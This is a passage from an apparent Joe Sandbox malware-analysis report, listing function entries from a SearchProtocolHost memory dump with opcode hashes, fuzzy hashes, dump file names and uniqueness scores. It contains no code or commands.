                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe0f1cd51da9608b83e5509264461b2dfde6b83dbb94b268aab1e834a6b409ac
                                                                                      • Instruction ID: 3245f0026accbf6f9fb0207116104b4672a740d300a9bd6c1839712e7e35ff37
                                                                                      • Opcode Fuzzy Hash: fe0f1cd51da9608b83e5509264461b2dfde6b83dbb94b268aab1e834a6b409ac
                                                                                      • Instruction Fuzzy Hash: 7D90023121140812E500A2584908747000587D4702F51C525A9154555EC775C8917532
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2EB0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c55daa88675753a3a1289a5f44765fba8e3015d63bbe25cc0cb680564ae0509
                                                                                      • Instruction ID: 2144fce6f39e3c489ebcb979c79fe840d219b5a10ff2b1f9ec8dd863b21fdbc5
                                                                                      • Opcode Fuzzy Hash: 7c55daa88675753a3a1289a5f44765fba8e3015d63bbe25cc0cb680564ae0509
                                                                                      • Instruction Fuzzy Hash: 9790023121140812E500A258491470B000587D4702F51C525A5154555DC73588517572
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2E80 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc30e744fe1ec2445f2441d0fb8e353eec1951a92bc78a5bdac960dce7a71485
                                                                                      • Instruction ID: ff2122724923cf90d86325828d0f4646d3511a88cfd31ceb25be9aae85895323
                                                                                      • Opcode Fuzzy Hash: fc30e744fe1ec2445f2441d0fb8e353eec1951a92bc78a5bdac960dce7a71485
                                                                                      • Instruction Fuzzy Hash: 4990026122100452E504A2584504706004587E5601F51C526A6144554CC6398C617126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2D50 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d46cef020112f1366883c78521f2f758aa860798a0ff6312612d2e28c221bfe
                                                                                      • Instruction ID: a694e697345abac92fe2510068b62a35a99a9d3812a27a4df18af931fa41cff9
                                                                                      • Opcode Fuzzy Hash: 9d46cef020112f1366883c78521f2f758aa860798a0ff6312612d2e28c221bfe
                                                                                      • Instruction Fuzzy Hash: C590022131100812E502A25845146060009C7D5745F91C526E5414555DC7358953B133
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2DC0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9f4f23b5b5813f233de08de8d8fa0720f4227acf3b6d8356254bcf228a64fc1
                                                                                      • Instruction ID: 84b5836d78b55c3919c649228a798faa1e02f0ceed5943359321434b834e4fba
                                                                                      • Opcode Fuzzy Hash: b9f4f23b5b5813f233de08de8d8fa0720f4227acf3b6d8356254bcf228a64fc1
                                                                                      • Instruction Fuzzy Hash: 4A90027121100812E540B2584504746000587D4701F51C525A9054554EC7698DD57666
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D3C30 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9adebfb278ebe23aef66691b4afb074cacca510f30a62a0c916868194695c41e
                                                                                      • Instruction ID: 458bda0647e1d21db7acc67694f9d6fdb30d0433089a7be930a103cb92b408be
                                                                                      • Opcode Fuzzy Hash: 9adebfb278ebe23aef66691b4afb074cacca510f30a62a0c916868194695c41e
                                                                                      • Instruction Fuzzy Hash: ED90023121200552E940A3585904A4E410587E5702B91D929A4005554CCA2488617222
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2C20 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fa584486ebc601a08e784e66ef8fcca3852eafe0d4635a2be64379f503f60ae
                                                                                      • Instruction ID: a20126819221bc5d0ba5c683d2fb1355157daa2bfbb73858922f785013240cd6
                                                                                      • Opcode Fuzzy Hash: 4fa584486ebc601a08e784e66ef8fcca3852eafe0d4635a2be64379f503f60ae
                                                                                      • Instruction Fuzzy Hash: 6290022121504852E500A6585508A06000587D4605F51D525A5054595DC7358851B132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2C10 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ad562e7a105d34a28ea524b9e9bbbf31605e177e66ff176ae81256cc6f6565f
                                                                                      • Instruction ID: d99c084782685e3caf4c0b2fc8d0cb2a498a43ff548040698dc8fc70bc472630
                                                                                      • Opcode Fuzzy Hash: 6ad562e7a105d34a28ea524b9e9bbbf31605e177e66ff176ae81256cc6f6565f
                                                                                      • Instruction Fuzzy Hash: BA90023121100813E500A2585608707000587D4601F51D925A4414558DD76688517122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2CD0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b936f78161e81965367af9a57e00e83381fb96bef676e403f2e980adfbe6a112
                                                                                      • Instruction ID: e7a6a3c150d079bd0a165884decb63c9faf959badd091906e77d92ced0b4d7e0
                                                                                      • Opcode Fuzzy Hash: b936f78161e81965367af9a57e00e83381fb96bef676e403f2e980adfbe6a112
                                                                                      • Instruction Fuzzy Hash: D290023125100812E541B2584504606000997D4641F91C526A4414554EC7658A56BA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D3C90 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fa2df72b6e769295e02de733a468236fad398a6df808fda1b9c060e9d4b57a9d
                                                                                      • Instruction ID: 65ded52da8376eb57da2352bd730f62b45703deac91c237b212c00cf0d7c4ea3
                                                                                      • Opcode Fuzzy Hash: fa2df72b6e769295e02de733a468236fad398a6df808fda1b9c060e9d4b57a9d
                                                                                      • Instruction Fuzzy Hash: E390023521100812E910A2585904646004687D4701F51D925A4414558DC76488A1B122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B20 Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: 46fecb14ac2201a62c8b76509461122be6847295317ed44616473ad553f422f5
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03799046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: 453cb93affa47a26c53f80838d5639891d06b331626a37fe5f2f3af1b81024aa
                                                                                      • Instruction ID: fd9a6bc53156919bdc2df7d9027aabc437c28eac58e443ce8e00500adc562643
                                                                                      • Opcode Fuzzy Hash: 453cb93affa47a26c53f80838d5639891d06b331626a37fe5f2f3af1b81024aa
                                                                                      • Instruction Fuzzy Hash: 14813A75D006699BDB35CF54CC45BEEB6B8AB48710F0445DAEA19B7240E7709E80DFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%